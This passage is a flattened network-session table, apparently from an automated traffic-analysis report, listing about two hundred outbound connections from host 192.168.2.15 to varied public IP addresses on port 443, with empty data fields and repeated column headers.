                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11198192.168.2.1549624213.179.80.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11199192.168.2.1534306150.35.112.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11200192.168.2.1548492145.213.19.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11201192.168.2.1542700209.55.76.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11202192.168.2.154400077.203.163.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11203192.168.2.1560680164.248.114.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11204192.168.2.154267852.88.123.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11205192.168.2.155684671.193.29.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11206192.168.2.1536504188.166.78.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11207192.168.2.154445499.85.123.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11208192.168.2.154414448.66.211.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11209192.168.2.155571693.123.234.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11210192.168.2.1536578134.148.247.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11211192.168.2.1560174189.48.169.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11212192.168.2.1560550112.242.156.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11213192.168.2.153785684.62.28.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11214192.168.2.1542538195.209.215.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11215192.168.2.1542686111.37.69.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11216192.168.2.1552690102.26.207.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11217192.168.2.1550354181.188.169.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11218192.168.2.155105470.9.77.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11219192.168.2.154523894.186.92.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11220192.168.2.1533846160.59.141.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11221192.168.2.1538298144.209.124.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11222192.168.2.1536998199.175.84.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11223192.168.2.1555594118.135.79.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11224192.168.2.153532471.7.99.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11225192.168.2.1534272164.110.96.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11226192.168.2.1548190128.199.96.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11227192.168.2.1550024146.36.125.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11228192.168.2.1553182179.78.43.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11229192.168.2.153373434.155.229.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11230192.168.2.1551692196.73.105.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11231192.168.2.1545742220.99.227.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11232192.168.2.155511483.93.7.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11233192.168.2.1547368175.26.245.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11234192.168.2.1557968197.220.91.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11235192.168.2.155287818.27.209.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11236192.168.2.1555572194.21.157.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11237192.168.2.1547464126.102.211.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11238192.168.2.1546694223.197.176.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11239192.168.2.1532984149.233.18.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11240192.168.2.155751212.145.38.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11241192.168.2.1552886179.250.106.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11242192.168.2.155209419.195.127.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11243192.168.2.1551412160.55.220.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11244192.168.2.155364817.185.105.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11245192.168.2.153714848.73.5.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11246192.168.2.155655671.189.129.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11247192.168.2.1543718195.187.28.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11248192.168.2.154498254.152.101.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11249192.168.2.1536778173.146.22.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11250192.168.2.154661861.76.119.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11251192.168.2.1555634197.240.161.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11252192.168.2.1558432119.14.186.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11253192.168.2.154406653.43.121.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11254192.168.2.1540302148.246.68.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11255192.168.2.1545310180.20.132.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11256192.168.2.1545150137.51.242.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11257192.168.2.1554864120.197.119.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11258192.168.2.153990278.162.173.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11259192.168.2.1533018189.170.35.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11260192.168.2.1538516179.69.103.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11261192.168.2.1551346118.187.50.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11262192.168.2.1553330203.249.41.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11263192.168.2.1532842132.247.111.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11264192.168.2.1539656177.19.200.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11265192.168.2.155939867.139.80.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11266192.168.2.1547986166.53.31.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11267192.168.2.1540818203.218.168.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11268192.168.2.154746462.238.114.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11269192.168.2.154133620.159.218.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11270192.168.2.154078043.6.154.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11271192.168.2.154666417.151.116.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11272192.168.2.154074679.210.248.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11273192.168.2.1543638124.5.199.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11274192.168.2.1558426194.68.199.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11275192.168.2.155984032.40.12.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11276192.168.2.1550178104.45.146.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11277192.168.2.1552746111.122.100.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11278192.168.2.155083888.114.8.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11279192.168.2.1540742100.44.51.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11280192.168.2.1554296121.42.250.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11281192.168.2.153795817.155.109.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11282192.168.2.1550628193.246.36.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11283192.168.2.15523425.109.150.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11284192.168.2.1560038103.193.143.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11285192.168.2.155809491.136.132.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11286192.168.2.153368644.120.186.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11287192.168.2.1546152147.204.230.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11288192.168.2.1534266222.55.176.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11289192.168.2.154809618.10.27.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11290192.168.2.154457298.199.19.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11291192.168.2.1543180186.136.172.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11292192.168.2.154437041.115.42.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11293192.168.2.1550398130.217.175.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11294192.168.2.1543188163.152.127.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11295192.168.2.1553642181.116.8.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11296192.168.2.1533330100.135.130.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11297192.168.2.1558574120.230.96.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11298192.168.2.1533582191.231.22.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11299192.168.2.155881441.72.4.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11300192.168.2.1537602193.158.208.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11301192.168.2.1552234192.176.25.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11302192.168.2.1559216145.22.97.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11303192.168.2.1555448216.243.7.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11304192.168.2.1558828114.252.118.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11305192.168.2.155441019.199.153.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11306192.168.2.1553530144.141.187.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11307192.168.2.1550906106.52.103.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11308192.168.2.1538240119.136.193.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11309192.168.2.155524683.59.35.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11310192.168.2.15339829.132.17.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11311192.168.2.154787419.197.56.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11312192.168.2.154269471.127.104.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11313192.168.2.1557890194.118.193.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11314192.168.2.1535574218.12.54.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11315192.168.2.1556570114.151.1.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11316192.168.2.1555930130.77.198.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11317192.168.2.1542532144.221.18.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11318192.168.2.1560644167.71.239.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11319192.168.2.1551474201.208.241.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11320192.168.2.1537450198.62.218.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11321192.168.2.155170884.106.80.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11322192.168.2.1536516207.215.226.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11323192.168.2.1560770114.41.10.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11324192.168.2.153597054.188.193.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11325192.168.2.1540336149.154.70.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11326192.168.2.1550260168.80.156.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11327192.168.2.1540878180.214.25.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11328192.168.2.155871218.29.218.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11329192.168.2.153718262.132.167.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11330192.168.2.1547954210.66.205.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11331192.168.2.1549076153.193.70.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11332192.168.2.155671262.173.80.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11333192.168.2.154522441.239.19.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11334192.168.2.154250845.146.165.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11335192.168.2.1535976196.98.15.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11336192.168.2.1550850193.72.99.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11337192.168.2.1560852172.53.196.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11338192.168.2.1535170171.62.55.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11339192.168.2.1555148221.146.113.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11340192.168.2.153390898.58.124.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11341192.168.2.1559872181.207.215.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11342192.168.2.1549512175.98.12.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11343192.168.2.1543292175.157.71.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11344192.168.2.1543402145.130.238.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11345192.168.2.155174412.17.227.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11346192.168.2.1544558124.9.219.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11347192.168.2.1541936211.214.177.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11348192.168.2.1553042223.91.164.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11349192.168.2.155326040.77.87.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11350192.168.2.1556832159.248.143.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11351192.168.2.1558172211.161.147.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11352192.168.2.1559172143.162.91.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11353192.168.2.154066888.187.103.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11354192.168.2.1536594223.206.22.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11355192.168.2.153892019.135.146.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11356192.168.2.154003837.91.245.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11357192.168.2.153823893.174.35.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11358192.168.2.1545906162.130.208.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11359192.168.2.154599688.158.71.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11360192.168.2.153575694.154.90.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11361192.168.2.155530031.26.229.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11362192.168.2.155506431.211.207.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11363192.168.2.1560642209.29.46.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11364192.168.2.1550046200.244.87.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11365192.168.2.1552602131.246.222.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11366192.168.2.1551926207.117.255.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11367192.168.2.1543654123.254.136.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11368192.168.2.1533126175.9.236.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11369192.168.2.154940244.29.56.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11370192.168.2.153497264.12.230.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11371192.168.2.1557986221.21.34.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11372192.168.2.1559778123.254.227.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11373192.168.2.1536488124.231.242.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11374192.168.2.1551920204.22.95.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11375192.168.2.1536844132.52.125.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11376192.168.2.1541218180.108.82.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11377192.168.2.1560378111.245.51.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11378192.168.2.1554206204.255.193.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11379192.168.2.1551060160.213.17.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11380192.168.2.1540064208.246.172.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11381192.168.2.155687479.145.86.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11382192.168.2.1546156152.30.47.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11383192.168.2.1546712193.104.1.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11384192.168.2.1552654197.95.81.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11385192.168.2.1560580136.197.225.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11386192.168.2.153520651.149.13.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11387192.168.2.1554862126.248.93.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11388192.168.2.1545152113.225.12.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11389192.168.2.1539566104.101.145.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11390192.168.2.1559704178.159.104.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11391192.168.2.1552248134.189.171.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11392192.168.2.1555026180.249.103.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11393192.168.2.1539246159.221.253.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11394192.168.2.153951276.213.47.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11395192.168.2.155344214.152.52.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11396192.168.2.154167260.171.25.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11397192.168.2.155701047.77.26.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11398192.168.2.153558625.120.178.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11399192.168.2.154672857.230.91.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11400192.168.2.154314287.93.49.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11401192.168.2.1554658210.165.220.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11402192.168.2.155523638.0.15.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11403192.168.2.1542818196.88.39.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11404192.168.2.1559694167.16.60.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11405192.168.2.155228827.129.142.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11406192.168.2.1550006119.241.202.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11407192.168.2.1551346144.194.47.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11408192.168.2.1536740116.220.189.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11409192.168.2.153565287.225.97.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11410192.168.2.153925059.124.240.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11411192.168.2.155177619.71.216.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11412192.168.2.15429761.116.238.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11413192.168.2.1545638109.83.75.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11414192.168.2.153898481.90.199.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11415192.168.2.153728284.123.83.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11416192.168.2.153525685.140.70.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11417192.168.2.1556022218.80.103.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            11418192.168.2.1548430150.37.96.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
